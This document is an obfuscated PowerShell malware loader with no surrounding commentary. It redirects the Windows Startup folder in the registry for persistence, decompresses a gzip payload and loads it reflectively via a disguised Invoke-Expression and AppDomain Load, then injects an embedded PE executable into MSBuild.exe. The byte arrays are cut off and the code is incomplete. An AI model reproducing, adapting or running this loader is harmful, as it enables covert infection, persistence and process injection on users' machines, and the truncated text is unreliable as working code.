Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\Users\Public\Data";
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\Users\Public\Data";
function GHNCRDRYS2 {[CmdletBinding()]Param ([byte[]] $SETUJDCCWZZRR)Process {
$UEEUDXHAZ = New-Object 'Syste@#$#^&^$#moryStream'.Replace('@#$#^&^$#','m.IO.Me') ( , $SETUJDCCWZZRR )
$PBAwKdpd = New-Object 'Syste@#$#^&^$#moryStream'.Replace('@#$#^&^$#','m.IO.Me')
$T5UE5SSHXX = New-Object 'System.I@@@@@@@@@pStream'.Replace('@@@@@@@@@','O.Compression.Gzi') $UEEUDXHAZ, ([IO.Compression.CompressionMode]::Decompress)
$HDJCCCXWS = New-Object byte[](1024)
while($true){
$RRRHYZ = $T5UE5SSHXX.Read($HDJCCCXWS, 0, 1024)
if ($RRRHYZ -le 0){break}
$PBAwKdpd.Write($HDJCCCXWS, 0, $RRRHYZ)
[byte[]] $GGGXBCBSGWH = $PBAwKdpd.ToArray()
Write-Output $GGGXBCBSGWH
$t0='DEX'.replace('D','I');sal g $t0;
[Byte[]]$RYSBDRYS=('>_1F,>_8B,>_08,>_00,>_00,>_00,>_00,>_00,>_04,>_00,>_EC,>_BB,>_77,>_58,>_53,>_4B,>_F3,>_00,>_7C,>_92,>_40,>_08,>_BD,>_57,>_51,>_41,>_5A,>_E8,>_21,>_B4,>_80,>_4A,>_EF,>_BD,>_37,>_51,>_08,>_49,>_80,>_40,>_48,>_42,>_12,>_7A,>_11,>_05,>_44,>_C4,>_82,>_62,>_41,>_C4,>_82,>_22,>_8A,>_0A,>_76,>_C4,>_8E,>_88,>_22,>_2A,>_4A,>_11,>_05,>_C4,>_8E,>_05,>_05,>_1B,>_88,>_5D,>_BF,>_3D,>_27,>_01,>_B9,>_BE,>_F7,>_7D,>_BF,>_DF,>_BF,>_DF,>_F3,>_7C,>_D1,>_33,>_67,>_67,>_67,>_76,>_76,>_66,>_76,>_76,>_76,>_F6,>_78,>_AF,>_6F,>_54,>_39,>_84,>_81,>_20,>_48,>_08,>_3C,>_BF,>_7F,>_43,>_50,>_33,>_C4,>_FF,>_39,>_40,>_FF,>_EF,>_BF,>_02,>_F0,>_48,>_CD,>_3D,>_23,>_05,>_9D,>_10,>_ED,>_D4,>_6C,>_46,>_F9,>_74,>_6A,>_86,>_24,>_D2,>_B9,>_1A,>_6C,>_0E,>_2B,>_81,>_43,>_4E,>_D1,>_A0,>_90,>_99,>_4C,>_16,>_4F,>_23,>_8E,>_A6,>_C1,>_49,>_63,>_6A,>_D0,>_99,>_1A,>_2E,>_FE,>_C1,>_1A,>_29,>_2C,>_2A,>_CD,>_44,>_52,>_52,>_4C,>_5B,>_20,>_23,>_C0,>_15,>_82,>_7C,>_50,>_42,>_90,>_D6,>_AB,>_0F,>_4B,>_A6,>_E4,>_3E,>_86,>_A4,>_34,>_C5,>_51,>_58,>_08
[byte[]]$FJGFBCEQWXXGJD = GHNCRDRYS2 $RYSBDRYS
$y='[System.Ap!!<>!!ain]'.replace('!!<>!!','pDom')|g;$g55=$y.GetMethod("get_CurrentDomain")
$uy='$g55.In!@ke($null,$null)'.replace('!@','vo')| g
$RNCXUSE4='$uy.Lo%$($FJGFBCEQWXXGJD)'.Replace('%$','ad')
$RNCXUSE4| g
[Byte[]]$RYEYWSFSVX=(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,165,158,109,96,0,0,0,0,0,0,0,0,224,0,2,1,11,1,8,0,0,98,5,0,0,12,0,0,0,0,0,0,222,129,5,0,0,32,0,0,0,0,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,224,5,0,0,2,0,0,0,0,0,0,2,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,132,129,5,0,87,0,0,0,0,160,5,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,192,5,0,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,8,0,0,0,0,0,0,0,0,0,0,0,8,32,0,0,72,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,228,97,5,0,0,32,0,0,0,98,5,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,115,114
[Byte[]]$GDSKKKDECDA = $RYEYWSFSVX
[Mice]::YU('MSBuild.exe',$GDSKKKDECDA)